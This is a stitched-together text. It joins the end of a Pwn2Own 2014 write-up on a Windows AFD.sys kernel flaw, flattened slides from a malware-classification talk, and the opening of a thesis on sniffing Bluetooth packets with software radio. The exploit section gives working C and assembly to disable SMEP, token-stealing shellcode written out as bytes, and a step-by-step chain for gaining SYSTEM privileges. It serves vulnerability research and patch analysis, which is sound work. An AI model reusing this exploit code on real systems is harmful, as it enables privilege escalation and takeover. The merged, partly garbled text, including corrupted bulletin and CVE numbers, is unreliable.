address = 0xfffff8 00000000 c0 | (leaked_dword <<  8) = 0xfffff803c2d5f3c0 (==nt!KiInitialProcess)  
SINGLE -GADGET -ROP FOR SMEP EVASION  
 
Disabling SMEP can be achieved by executing  a single  ROP gadget  in order to make userland buffers executable again 
from kernel mode. To disable SMEP , the 20th bit of the cr4 register has to be set to 0. For modern CPUs setting cr4 to 
0x406f8  proved to be working fine.  
The gadget to set cr4 can be found at the end of  nt!KiConfigureDynamicProcessor : 
mov     cr4, rax  
add     rsp, 28h  
retn 
The fact that we only need one ROP gadget is based on the layout of the stack  at the moment of the return ins truction  
when using the QueryIntervalProfile  pointer in the  nt!HalDispatchTable  as overwrite target . In this situation esp will 
contain the first parameter passed to ZwQueryIntervalProfile as userland pointer ! In most attempts the upper 8 bytes 
were set to  0 and it was  possible to directly return into userland code. However, this proved to be a bit unstable , since 
we only have esp reliably pointing to userland, not rsp ! This can be solved be executing a function beforehand which 
will "clean" up the stack wi th 0s at the needed stack location, so that we can reliably predict the userland return 
address.  Executing ntdll!ZwCreateTimer right before ntdll! ZwQueryIntervalProfile  will do this just fine. This is the 
relavant part of the exploit  (in c) : 
HANDLE timer;  
__asm { 
 push 0 
 push 0 
 push 0x1f0003  
 lea eax, [ timer ]  
 push eax  
 call ZwCreateTimer    // clean stack address with 0s  
} 
 
int newcr4 = 0x000406f8;  
__asm { 
 lea eax, [ newcr4 ]  
 push eax  
 push shellcode  
 call ZwQueryIntervalProfile  // disable SMEP and ex ecute shellcode ! 
} 
  
Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 13 - SHELLCODE  
 
Following shellcode has been used to replace the current process toke n with the SYSTEM process token. No further 
explanation should be necessary here, since this technique is common practice : 
BYTE sc[] =   
"\x41\x51"   // push r9   save regs  
"\x41\x52"   // push r10  
        
"\x65\x4C\x8B\x0C\x25\x88\x01\x00\x00" // mov r9, gs:[0x188], get _ETHREAD from KPCR 
     (PRCB @ 0x180 from KPCR, _ETHREAD @ 0x8 from PRCB)  
"\x4D\x8B\x89\xB8\x00\x00\x00"  // mov r9, [r9+0xb8], get _EPROCE SS from _ETHREAD  
"\x4D\x89\xCA"    // mov r10, r9  save current eprocess  
"\x4D\x8B\x89\x40\x02\x00\x00"  // mov r9, [r9+0x240]   $a, get blink  
"\x49\x81\xE9\x38\x02\x00\x00"  // sub r9, 0x238    => _KPROCESS  
"\x49\x83\xB9\xE0\x02\x00\x00\x04" // cmp [r9+0x2e 0], 4 is UniqueProcessId == 4?  
"\x75\xe8"     // jnz $a  no? then keep searching!  
"\x4D\x8B\x89\x48\x03\x00\x00"  // mov r9, [r9+0x348]  get token  
"\x4D\x89\x8A\x48\x03\x00\x00"  // mov [r10+0x348], r9  replace our token with 
         system token  
"\x41\x5A"   // pop r10    restore regs  
"\x41\x59"   // pop r9   
"\x48\x8B\x44\x24\x20" // mov rax, [rsp+0x20]  repair stack  
"\x48\x83\xC0\x3F"  // add rax, 0x3f  
"\x48\x83\xEC\x30"  // sub rsp, 0x30  
"\x48\x89\x04\x24"  // mov [rsp], rax  
"\xc3";   // ret    resume  
PUTT ING IT ALL TOGETHER  
 
Using the described i nsights, the provided exploit p erforms the following tasks:  
 
1. Trigger IOCTL 0x1207f to prepare the AFD-internal heap structure with MDL size 0x100  
2. Create a FactoryWorker object on the NonPagedPoolNx  pool of size 0x1 00 to replace the MDL  buffer  
3. Trigger IOCTL 0x120c3 to free the FactoryWorker object  
4. Call ZwQueryEaFile to replace the freed object with controlled data of size 0x100  
5. Leak nt!KiInitialProcess from 0xf ffffa8000000301 to compute the NT  base address and evade ASLR  
6. Perform a write to nt!HalDispatchtable to overwrite the QueryIntervalProfile  pointer  with the gadget 
address from nt!KiConfigureDynamicProcessor  as ROP entry point  
7. Execute Single -Gadget -ROP to disable  SMEP  
8. Directly return from gadget to  userland code and execute the shellcode  
9. Shellcode: Replace current process token with token of the SYSTEM process  
 
  
Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 14 - PATCH ANALYSIS  
A patch for the described vulnerability has been released on July 8 th, 20146. The assigned Microsoft Security Bulletin 
number is MS14 -0407 and the official CVE number is CVE-2014 -17678. A ZDI advisory has also been released as ZDI -14-
2209. 
The analysis is based on a fully -patched version of Windows 8.1 Professional (x64) as of July 11th 2014.  
File Version  MD5  
afd.sys  6.3.9600.17194  374e2729 5f0a9dcaa8fc96370f9beea5  
ntoskrnl.exe  6.3.9600.17085  cfb353b4e33afe922c3a62dbc9c9b0a8  
 
Following disassembly from AfdReturnTpInfo  shows the call path to the nt!IoFreeMdl call  (Old and new versions do 
not differ) . In order to reach the “bad” path, TpInfo+ 0x4c (TpInfoElementCount) has to be > 0:  
 
 
6 https://technet.microsoft.com/library/security/ms14 -jul  
7 https://technet.microsoft.com/library/security/ms14 -040  
8 http://www.cve.mitre.org/cgi -bin/cvename.cgi?name=CVE -2014 -1767   
9 http://zerodayinitiative.com/advisories/ZDI -14-220/   

Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 15 - The patch ensures that the code path leading to nt!IoFreeMdl cannot be reached twice for a specific TpInfo structure.  
Following disassembly shows the last instructions of the AfdReturnTpInfo   function of the vuln erable AFD.sys  driver : 
 
 
Compared to the patched version, which sets TpInfo+0x4c to 0 each time AfdReturnTpInfo  is hit.  
 
 
Sebastian Apelt, siberas, 07/2014  
Faster, More Effective 
Flowgraph-based Malware 
Classification
Silvio Cesare silvio.cesare@gmail.com
http://www.foocodechu.com
Ph.D. Candidate, Deakin University
Ph.D. Candidate at Deakin University.
Research
◦Malware detection.
◦Automated vulnerability discovery (check out my 
other talk in the main conference).
Did a Masters by research in malware
◦“Fast automated unpacking and classification of 
malware”.
◦Presented last year at Ruxcon 2010.
This current work extends last year’s work.Who am I and where did this 
talk come from?
Traditional AV works well on known samples.
Doesn’t detect unknown samples.
Doesn’t detect “suspiciously similar” 
samples.
Uses strings as a signature or “birthmark”.
Compares birthmarks by equality.Motivation
Birthmarks can be program structure.
More static among malware variants.
Birthmarks can be compared using 
“approximate similarity”.
Able to detect unknown samples that are 
suspiciously similar to known malware.
Vastly reduce number of required signatures.What can be done?
The Software Similarity Problem

Control flow is more invariant among 
polymorphic and metamorphic malware.
A directed graph representing control flow.
A control flow graph for every procedure.
One call graph per program.The Control Flow 
Birthmark
Graphs

Known as the “Graph Isomorphism” 
problem.
Identifies equivalent “structure”.
Not proven to be in NP, but no polynomial 
time algorithm known.Graph Equality
The number of basic operations applied to a 
graph to transform it to another graph.
If you know the distance between two 
objects, you know the similarity .
Complexity in NP and infeasible.Graph Edit Distance
Decompilation

Input is a string.
Extract all substrings of fixed size Q.
Substrings are known as q-grams.
Let’s take q-grams of all decompiled graphs.Q-Grams

An array <E1,...,En>
A feature vector describes the number of 
occurrences of each feature.
En is the number of times feature En occurs.
Let’s make the 500 most common q-grams 
as features.
We use feature vectors as birthmarks.Feature Vectors
A vector is an n-dimensional point.
E.g. 2d vector is <x,y>
Fast.Vector Distance

Software similarity problem extended to 
similarity search over a database.
Find nearest neighbours (by distance) of a 
query.
Or find neighbours within a distance of the 
query. Nearest Neighbour Search
The Software Similarity Search

Vector distances here are “metric”.
It has the mathematical properties of a 
metric.
This means you can do a nearest neighbour 
search without brute forcing the entire 
database!Metric Trees
System is 100,000 lines of code of C++.
The modules for this work < 3000 lines of code.
System translates x86 into an intermediate 
language (IL).
Performs analysis on architecture independent 
IL.
Unpacks malware using an application level 
emulator.Implementation
Database of 10,000 malware.
Scanned 1,601 benign binaries.
10 false positives. Less than 1%.
Using additional refinement algorithm, 
reduced to 7 false positives.
Very small binaries have small signatures 
and cause weak matching.Evaluation – False 
Positives
Calculated similarity between Roron 
malware variants.
Compared results to Ruxcon 2010 work.
In tables, highlighted cells indicates a 
positive match.
The more matches the more effective it is.Evaluation - Effectiveness
Malware Variant Detection
aobdegkmqa
ao0.4
40.2
80.2
70.2
80.5
50.4
40.4
40.4
7
b0.4
40.2
70.2
70.2
70.5
11.0
01.0
00.5
8
d0.2
80.2
70.4
80.5
60.2
70.2
70.2
70.2
7
e0.2
70.2
70.4
80.5
90.2
70.2
70.2
70.2
7
g0.2
80.2
70.5
60.5
90.2
70.2
70.2
70.2
7
k0.5
50.5
10.2
70.2
70.2
70.5
10.5
10.7
5
m0.4
41.0
00.2
70.2
70.2
70.5
11.0
00.5
8
q0.4
41.0
00.2
70.2
70.2
70.5
11.0
00.5
8
a0.4
70.5
80.2
70.2
70.2
70.7
50.5
80.5
8aobdegkmqa
ao 0.700.280.280.270.750.700.700.75
b0.740.310.340.330.821.001.000.87
d0.280.290.500.740.290.290.290.29
e0.310.340.500.640.320.340.340.33
g0.270.330.740.640.290.330.330.30
k0.750.820.290.300.290.820.820.96
m0.741.000.310.340.330.821.000.87
q0.741.000.310.340.330.821.000.87
a0.750.870.300.310.300.960.870.87 aobdegkmqa
ao 0.8
60.5
30.6
40.5
90.8
60.8
60.8
60.8
6
b0.8
8 0.6
60.7
60.7
10.9
71.0
01.0
00.9
7
d0.6
50.7
2 0.8
80.9
30.7
30.7
20.7
20.7
3
e0.7
20.8
00.8
7 0.9
30.8
00.8
00.8
00.8
0
g0.6
90.7
70.9
30.9
3 0.7
70.7
70.7
70.7
7
k0.8
80.9
70.6
70.7
70.7
2 0.9
70.9
70.9
9
m0.8
81.0
00.6
60.7
60.7
10.9
7 1.0
00.9
7
q0.8
81.0
00.6
60.7
60.7
10.9
71.0
0 0.9
7
a0.8
70.9
70.6
70.7
70.7
20.9
90.9
70.9
7 Exact 
Matching 
(Ruxcon 2010)Heuristic Approximate 
Matching (Ruxcon 2010)
Q-Grams
Faster than Ruxcon 2010.
Median benign processing time is 0.06s.
Median malware processing time is 0.84s.
Slowest result may be memory thrashing.Evaluation - Efficiency
% 
SamplesBenign 
Time(s)Malware 
Time(s)
100.02 0.16
200.02 0.28
300.03 0.30
400.03 0.36
500.06 0.84
600.09 0.94
700.13 0.97
800.25 1.03
900.56 1.31
100 8.06585.16
Improved effectiveness and efficiency 
compared to Ruxcon 2010.
Runs in real-time in expected case.
Large functional code base and years 
of development time.
Happy to talk to vendors.Conclusion
Full academic paper at IEEE Trustcom.
Research page http://www.foocodechu.com
Book on “Software similarity and classification” 
available in 2012. 
Wiki on software similarity and classification 
http://www.foocodechu.com/wikiFurther InformationFinal Report: Implementation of the
Bluetooth stack for software defined radio,
with a view to sniffing and injecting packets
Dominic Spill
May 14, 2007
Supervisor: Andrea Bittau
This report is submitted as part requirement for the MSci degree in Com-
puter Science at University College London. It is substantially the result of
my own work except where explicitly indicated in the text.
The report may be freely copied and distributed provided the source is ex-
plicitly acknowledged.
i
ii
Abstract
This project sets out to implement some of the functionality of the
Bluetooth protocol using the GNU Radio framework and a Univer-
sal Software Radio Peripheral (USRP) to replace dedicated Bluetooth
hardware. The functionality is specifically the ability to read packets
from a connection between two device, although in this case the de-
vices should be unaware that the packets are being read by a third
party.
The ability to receive and demodulate a stream of data from a
Bluetooth connection is achieved, using the USRP to receive the sig-
nal, and the GNU Radio Gaussian Minimum Shift Keying (GMSK)
demodulator to convert the complex signal to binary. The control and
settings of these parts of the system are found through experimenta-
tion with signal processing.
The binary data is then converted to packets and data is extracted
from them in order to gather information about the devices in the
piconet so that the MAC address and value of the clock of the piconet
can be obtained. Data from higher levels of the protocol stack can also
be extracted from these packets, which could lead to possible attacks
on a system.
The ability to sniff packets gives an insight into the protocol at
a lower level than has been investigated by previous academic work.
This moves attacks, that were theoretical in nature, much closer to
the goal of a practical attack.
Contents
1 Introduction 1
1.1 Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.1.1 Bluetooth . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.1.2 GNU Radio . . . . . . . . . . . . . . . . . . . . . . . . 2
1.1.3 The Universal Software Radio Peripheral . . . . . . . . 3
1.1.4 Why use GNU Radio for Bluetooth? . . . . . . . . . . 3
1.2 Aims and outcomes . . . . . . . . . . . . . . . . . . . . . . . . 4
1.2.1 Goals . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.2.2 Results . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
2 Background 5
2.1 Definitions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2.2 Properties of Bluetooth devices and connections . . . . . . . . 6
2.2.1 FEC1/3 . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.2.2 FEC2/3 . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.3 Packet format . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.3.1 Access code . . . . . . . . . . . . . . . . . . . . . . . . 7
2.3.2 Packet header . . . . . . . . . . . . . . . . . . . . . . . 8
2.3.3 Packet types . . . . . . . . . . . . . . . . . . . . . . . . 9
2.3.4 Payload . . . . . . . . . . . . . . . . . . . . . . . . . . 11
2.3.5 Data whitening . . . . . . . . . . . . . . . . . . . . . . 12
2.4 Bluetooth connection protocol . . . . . . . . . . . . . . . . . . 12
2.5 Passive vs active attacks . . . . . . . . . . . . . . . . . . . . . 13
2.6 Related work . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
iii
CONTENTS iv
3 Finding the signal 15
3.1 Why does the signal need to be found? . . . . . . . . . . . . . 15
3.2 Details of the signal . . . . . . . . . . . . . . . . . . . . . . . . 15
3.3 Experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
3.3.1 Random stabbing in the dark . . . . . . . . . . . . . . 17
3.3.2 Test packets . . . . . . . . . . . . . . . . . . . . . . . . 17
4 Interpreting the signal 20
4.1 Deciphering test packets . . . . . . . . . . . . . . . . . . . . . 20
4.2 Real packets . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
4.3 32 possible UAPs . . . . . . . . . . . . . . . . . . . . . . . . . 23
5 Implemented functions 27
5.1 Experimental setup . . . . . . . . . . . . . . . . . . . . . . . . 27
5.1.1 Physical layout . . . . . . . . . . . . . . . . . . . . . . 27
5.1.2 Data flow of the signal . . . . . . . . . . . . . . . . . . 28
5.2 GNU Radio gr-bluetooth block . . . . . . . . . . . . . . . . . 28
5.2.1 Modules . . . . . . . . . . . . . . . . . . . . . . . . . . 29
5.3 How the modules work . . . . . . . . . . . . . . . . . . . . . . 30
5.3.1 Access Code . . . . . . . . . . . . . . . . . . . . . . . . 31
5.3.2 Header . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
5.3.3 Payload . . . . . . . . . . . . . . . . . . . . . . . . . . 32
5.4 GNU Radio scripts . . . . . . . . . . . . . . . . . . . . . . . . 32
5.5 bccmd . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
5.6 Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
5.6.1 Access code . . . . . . . . . . . . . . . . . . . . . . . . 34
5.6.2 Header . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
5.6.3 Payload . . . . . . . . . . . . . . . . . . . . . . . . . . 35
6 Evaluation 36
6.1 The USRP’s role in Bluetooth hacking . . . . . . . . . . . . . 36
6.2 Exploiting the Bluetooth protocol . . . . . . . . . . . . . . . . 37
6.2.1 Finding the MAC . . . . . . . . . . . . . . . . . . . . . 37
6.2.2 Finding the clock . . . . . . . . . . . . . . . . . . . . . 38
CONTENTS v
6.2.3 Putting it all together . . . . . . . . . . . . . . . . . . 38
7 Conclusions 40
7.1 Have the aims been met? . . . . . . . . . . . . . . . . . . . . . 40
7.2 Why is this not a full implementation? . . . . . . . . . . . . . 40
7.2.1 Finding the signal . . . . . . . . . . . . . . . . . . . . . 40
7.2.2 Lack of frequency hopping . . . . . . . . . . . . . . . . 41
7.3 Software written . . . . . . . . . . . . . . . . . . . . . . . . . 41
7.4 Where does this leave Bluetooth, GNU Radio and the USRP? 42
8 Further work 43
8.1 Gathering more data from sniffed packets . . . . . . . . . . . . 43
8.2 Hopping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
8.3 Using commodity hardware . . . . . . . . . . . . . . . . . . . 44
8.4 Mounting an attack . . . . . . . . . . . . . . . . . . . . . . . . 44
A System manual 46
A.1 Command line tools . . . . . . . . . . . . . . . . . . . . . . . . 46
A.1.1 bccmd . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
A.1.2 packet finder . . . . . . . . . . . . . . . . . . . . . . . 46
A.1.3 packet sniffer . . . . . . . . . . . . . . . . . . . . . . . 47
A.2 GNU Radio Bluetooth (gr-bluetooth) . . . . . . . . . . . . . . 47
A.2.1 sniffer . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
A.2.2 bluetooth LAP sniffer.py . . . . . . . . . . . . . . . . . 47
A.2.3 bluetooth sniffer.py . . . . . . . . . . . . . . . . . . . . 47
A.2.4 file sniffer.py . . . . . . . . . . . . . . . . . . . . . . . 48
B User manual 49
B.1 Command line tools . . . . . . . . . . . . . . . . . . . . . . . . 49
B.1.1 bccmd . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
B.1.2 packet finder . . . . . . . . . . . . . . . . . . . . . . . 50
B.1.3 packet sniffer . . . . . . . . . . . . . . . . . . . . . . . 50
B.2 GNU Radio Bluetooth (gr-bluetooth) . . . . . . . . . . . . . . 51
B.2.1 sniffer . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
CONTENTS vi
B.2.2 bluetooth sniffer.py . . . . . . . . . . . . . . . . . . . . 51
B.2.3 file sniffer.py . . . . . . . . . . . . . . . . . . . . . . . 51
B.3 Frequency / gain . . . . . . . . . . . . . . . . . . . . . . . . . 51
B.3.1 Frequency . . . . . . . . . . . . . . . . . . . . . . . . . 51
B.3.2 Gain . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
C Test results 53
C.1 Packet codes and error checks . . . . . . . . . . . . . . . . . . 53
C.1.1 acgen() . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
C.1.2 hecgen() . . . . . . . . . . . . . . . . . . . . . . . . . . 53
C.1.3 crcgen() . . . . . . . . . . . . . . . . . . . . . . . . . . 53
C.2 Packet sniffing and data extraction . . . . . . . . . . . . . . . 54
C.2.1 sniff ac() . . . . . . . . . . . . . . . . . . . . . . . . . . 54
C.2.2 UAP from hec() . . . . . . . . . . . . . . . . . . . . . . 54
C.2.3 unwhiten() . . . . . . . . . . . . . . . . . . . . . . . . . 54
D Interim report 55
D.1 Progress made to date . . . . . . . . . . . . . . . . . . . . . . 55
D.2 Further work . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
E Code 58
E.1 Access code . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
E.1.1 codeword() . . . . . . . . . . . . . . . . . . . . . . . . 58
E.1.2 acgen() . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
E.1.3 checkac() . . . . . . . . . . . . . . . . . . . . . . . . . . 63
E.1.4 sniffac() . . . . . . . . . . . . . . . . . . . . . . . . . . 64
E.2 Header . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
E.2.1 hecgen() . . . . . . . . . . . . . . . . . . . . . . . . . . 66
E.2.2 UAP from HEC . . . . . . . . . . . . . . . . . . . . . . 67
E.2.3 Unwhiten header . . . . . . . . . . . . . . . . . . . . . 68
E.3 Payload . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69
E.3.1 crcgen() . . . . . . . . . . . . . . . . . . . . . . . . . . 69
E.4 Common functions . . . . . . . . . . . . . . . . . . . . . . . . 70
E.4.1 reverse . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
CONTENTS vii
E.4.2 convert to one LSB per byte format . . . . . . . . . . . 70
Chapter 1
Introduction
This work sets out to implement some of the functions of the Bluetooth
protocol using the hardware designed for the GNU Radio project, which
gives complete control over the radio to the software controlling it. A single
frequency is monitored for packets, which are captured, demodulated and
interpreted. The process gives valuable insight into the way that Bluetooth
works at a lower level than has been studied before.
Research has concentrated on attacks at a higher level of the protocol,
such as encryption, key exchange, brute forcing the pin or extracting data
from a previously paired device[ 4,5,14], but many of these assume that
packets can be sniffed from an arbitrary connection, this work takes steps
toward achieving this goal and enabling a practical demonstration of these
theoretical attacks.
1.1 Background
1.1.1 Bluetooth
The Bluetooth communication protocol was developed by the “Bluetooth
Special Interest Group (SIG) ... comprised of ... Agere, Ericsson, IBM, Intel,
Microsoft, Motorola, Nokia and Toshiba” [ 1] in 1998. It was designed as a
cable replacement protocol and is widely used for low bitrate data transfer
1
CHAPTER 1. INTRODUCTION 2
such as voice and small data communications. It is mostly marketed as a
mobile adhoc technology, and is therefore present in most modern mobile
telephone handsets, PDAs and notebook computers.
There are alternatives to Bluetooth, such as 802.11 and zigbee, which
are both IEEE standards and operate in the same 2.4GHz band. They are
used for high(54Mbps) and low(250kbps)[ 3] data transfer rates respectively.
802.11 is a very common technology which is often used for LAN connectivity
as a replacement for ethernet. There are many known exploits and attacks
against it which allow it to be snooped or used as an up-link to the inter-
net without authorisation. Zigbee is less prolific and is aimed at the field of
sensornets and home automation[ 2], its uses will likely grow in the coming
years, but as yet it is relatively unheard of.
Bluetooth can be implemented on a single chip for a cost of around $3[ 6].
This means that it is often cheaper to add to a device than 802.11, zigbee
or even cabled communication. This all adds up to make it an extremely
common technology, especially in the workplace, which makes it interesting
from a security point of view.
1.1.2 GNU Radio
The GNU Radio project is a framework for performing digital signal process-
ing and controlling software defined radio. It allows for rapid development of
signal processing application by joining “blocks” together to form a pipeline,
taking the signal from reception to useful output.
A “block” is a small step of processing within a pipeline, they range from
file sources and sinks, to demodulators and from packet parsers to PAL tele-
vision decoders. Most blocks are written in C++ with a frontend in python,
the scripts that link the pipeline stages are written in python. It is a future
goal of the project to allow entire applications to be written in C++, this
well reduce the overheads and allow some of the slower pipelines to run in
CHAPTER 1. INTRODUCTION 3
real time.
1.1.3 The Universal Software Radio Peripheral
The Universal Software Radio Peripheral is the hardware designed to be
used with GNU Radio software, it was designed and built by Ettus research
[17]. The device consists of a mainboard with digital signal processors on it,
along with connected daughterboards which are specific to various frequency
bands. The RFX-2400 is aimed at the 2.4GHz to 2.5GHz industrial, scientific
and medical band. This is the frequency band that Bluetooth uses, and is
therefore the only daughterboard needed. It comes with two connections, one
for transmission and receptions, and one that only receives, for the majority
of uses only transmission or reception will be used at any one time, so the
combined port shall be used.
1.1.4 Why use GNU Radio for Bluetooth?
Bluetooth devices are small, cheap and easy to get hold of, so the decision
to implement the protocol using a complex piece of rare and expensive hard-
ware may seem an odd one. The decision stems from the problem of trying
to sniff packets of other communications because the commodity hardware
ignores packets which are not destined for that device. The debug mode
of the Cambridge Silicon Radio (CSR) devices will allow for the MAC of
the device to be altered, but this would only allow communications to be
snooped if the clock signal and MAC of the system to be sniffed are known.
This is unlikely to be known without internal knowledge of the system con-
cerned, which would probably provide easier avenues of attack. This work
is concerned with sniffing packets from an arbitrary communication, which
was established at some point before sniffing was started.
The GNU Radio is useful for this because it allows the frequency of the
signal to be set at any point and is not locked into hopping or a specific
protocol. This means that the hopping pattern of a device can be followed
CHAPTER 1. INTRODUCTION 4
without having to pair devices, giving the option of an entirely passive attack.
The framework, coupled with the USRP device, allows packets to captured
and studied, giving an insight into the Bluetooth protocol at the radio and
baseband layers that has not been possible for the average user until now.
1.2 Aims and outcomes
1.2.1 Goals
The aim of this work is to produce software with the ability to sniff pack-
ets from an arbitrary Bluetooth connection, giving the chance to attack a
communication and extract user data from the connection. This software
should use the USRP device, along with the GNU Radio framework, to allow
information about the connection, as well as the devices taking part, to be
read from the packets that are received.
1.2.2 Results
The software written is able to receive a signal on a single frequency and
demodulate this into a stream of binary data. The binary stream is then
split into packets by searching for known patterns within the data. Then
information can be extracted, from these packets, about the devices involved
in the communication. This brings the the ability to attack communications
between Bluetooth devices a lot closer, and shows that there are only a small
number of steps to take before a practical attack can be perpetrated.
Chapter 2
Background
The Bluetooth specification is a large and complicated document, and a
considerable amount of time needs to be taken in order to understand the
way by which connection and communication takes place. Version 1.2 of the
document is 1200 pages in length, and covers all aspects of the protocol. Key
parts of the specification, which relate to the work later in this document,
are described below.
2.1 Definitions
Several phrases are used here, and throughout this document, to describe
functions, devices and variables, these are defined here for ease of reference.
USRP Universal software radio peripheral, see Section 1.1.3
RFX-2400 The 2.4GHz daughterboard to the USRP, locked to the Indus-
trial, Scientific and Medical frequency band
Access Code An identifier at the start of the packet
HEC Header Error Check
CRC Cyclic Redundancy Check
UAP Upper Address Part
LAP Lower Address Part
NAP Non-significant Address Part
5
CHAPTER 2. BACKGROUND 6
LTADDR Logical Transport Address, a unique address given to each de-
vice within a piconet
Clock Clock refers to the internal clock of a Bluetooth device
Piconet A personal area network formed by one master and many slave de-
vices
FEC Forward Error Correction, applied to packets to mitigate transmission
errors
LFSR Linear Feedback Shift Register, used to calculate HEC, CRC and
whitening
GFSK Gaussian Frequency Shift Keying, the modulation system used by
the Bluetooth radio layer
GMSK Gaussian Minimum Shift Keying, a modulation technique that can
be tuned to function as GFSK
2.2 Properties of Bluetooth devices and con-
nections
Each Bluetooth enabled device has a MAC address assigned by the IEEE
from the pool of available six byte IDs, this is split into three parts, LAP
for the least significant three bytes, UAP for the next byte, and NAP for the
two most significant devices. The device also maintains a clock which is a 28
bit counter that increments once every 312.5us (a 3.2KHz signal).
All communications are packet based and packets are sent at a rate of 1600
per second. Data is modulated using GFSK modulation, where a frequency
shift of +115KHz represents a binary 1, and -115KHz represents a binary 0.
This data is often protected with forward error correction which comes in
two forms, FEC1/3 and FEC2/3.
CHAPTER 2. BACKGROUND 7
2.2.1 FEC1/3
FEC 1/3 outputs three times the number of input bits. It does this by
replicating each input bit three times, so an input stream of “01010” becomes
“000111000111000”. When decoding the packet any bit errors can be avoided
by simply averaging the bits received in groups of three.
2.2.2 FEC2/3
FEC 2/3 encoding outputs a five bit Hamming code for every ten data bits
that are taken as input. This can be used to check for bit errors, and correct
many small errors. If the input is not divisible by ten then the last part is
padded with ‘0’ bits to bring it up to length. The algorithm for producing
the Hamming code is defined by a LFSR in vol 2, part B, section 7.5[ 7].
2.3 Packet format
Packets are made up of three sections, access code, header and payload. All
packets have an access code to inform other devices which piconet the packet
is meant for, and most have a header and payload with data in them. The
header defines the type of packet that is being transmitted, and the data
stored in the payload is formatted accordingly.
2.3.1 Access code
Each packet has an access code which lets all listening devices know which
piconet it is being transmitted to. The access code is normally 72 bits long
and is generated from the three least significant bytes of the MAC address
(LAP) of the master device. The ID packet, used for finding devices within
range, is just a 68 bit access code as it needs to be transmitted in a shorter
amount of time. The access code is formed by creating a BCH(64, 30) code,
or “syncword”, from the LAP and a six bit Barker sequence set by the most
significant bit of the LAP. A preamble and a trailer are added based on the
CHAPTER 2. BACKGROUND 8
first and last bits of the syncword respectively. This is shown in Figure 2.1.
Figure 2.1: Composition of an access code [ 7]
The preamble is set to 1010 or 0101 if the LSB of the codeword is 1 or 0
respectively. The Barker code and trailer are set together as 1100101010 or
0011010101 if the MSB of the LAP is 1 or 0 respectively.
When sniffing packets the LAP can be taken straight from the access
code, and then checked against the BCH(64, 30) code to confirm that it is a
packet and not just noise. The start of a packet itself can be found by looking
for the preamble and Barker code + trailer sequences of bits at the correct
distance apart. The access code is always the same for a given piconet, it
does not change with the device that is transmitting.
2.3.2 Packet header
Every packet, other than the ID packet, has a packet header directly following
the access code which gives the device ID within the piconet, the type of the
packet and flow, ack and sequence information. This is followed by a header
error check (HEC) which is calculated from the ten bits of header data by a
linear feedback shift register (LFSR), which is initialised with the UAP of the
master device. The packet header is encoded withFEC1/3 and also whitened
with data based on the state of the clock at time of transmission, it is the
encoded with forward error correction (FEC). Figure 2.2shows the layout of
the data within the packet header before whitening or FEC is applied.
CHAPTER 2. BACKGROUND 9
Figure 2.2: Composition of a packet header [ 7]
2.3.3 Packet types
There are 18 different packet types, which fall into four groups based on the
type of data transfer that occurs. SCO and eSCO connections often, but
not always, carry voice data, while ACL links carry file data and control
information for the higher layers of the protocol. The specific details of these
packet are given here for reference only, the details are not required for a full
understanding of the work described later in the document.
common packets
Common packets that are used for control and connection establishment are:
ID- a 68bit packet used to signal the start of connection establishment.
FHS - a 240bit packet used to transfer MAC and clock data between devices
in order for them to synchronise.
POLL - used to check that a device is still available and listening for data,
can be used as a low level ping.
NULL - used as a response to acknowledge packet transmission.
Asynchronous Connection-Less (ACL) packets
ACL packets contain a variable length payload followed by a CRC, they are
used for data transfer which is not timing critical. There are two types, each
with a number of different length variants.
DH1 - a packet containing up to 27 bytes of data, with a CRC at the end.
DH packets do not have forward error correction applied.
CHAPTER 2. BACKGROUND 10
DH3 - identical to DH1 packet, but takes three times as long to transmit
and carries up to 183 bytes of data.
DH5 - identical to DH1 packet, but takes five times as long to transmit and
carries up to 339 bytes of data.
DM1 - a packet carrying up to 17 bytes of data, with a CRC at the end.
The data is encoded with FEC2/3.
DM3 - the same as DM1, but takes three times as long to transmit, carries
up to 121 bytes of data.
DM5 - as DM1, but takes five times as long to transmit, carries up to 224
bytes.
AUX1 - This is defined as an axillary packet, and is reserved for future use.
Synchronous Connection Oriented (SCO) packets
SCO packets are used to transfer voice or data at 64kb/s, there are four
packets, the choice of which is based on length of data to be sent, as most
of them have fixed length data fields, with the DV packet being used for
transferring voice and data in one packet with a variable field length. All
packets take the same amount of transmission time.
HV1 - carries 10 bytes of data protected by FEC1/3 encoding.
HV2 - is a variant of the HV1 packet but uses FEC2/3, and can contain up
to 20 bytes of data.
HV3 - is not protected by FEC encoding and therefore can carry 30 bytes
of user data.
DV - carries 10 bytes of voice data followed by a variable length data field.
The data field is protected by FEC2/3 encoding.
Extended Synchronous Connection Oriented (eSCO) packets
The eSCO packets are used for the same purposes as SCO packets, but con-
tain a CRC at the end of the data section. There are three types based on
CHAPTER 2. BACKGROUND 11
length, but no equivalent to the DV packet type. The length of the data in
the packets is decided at the establishment of the connection.
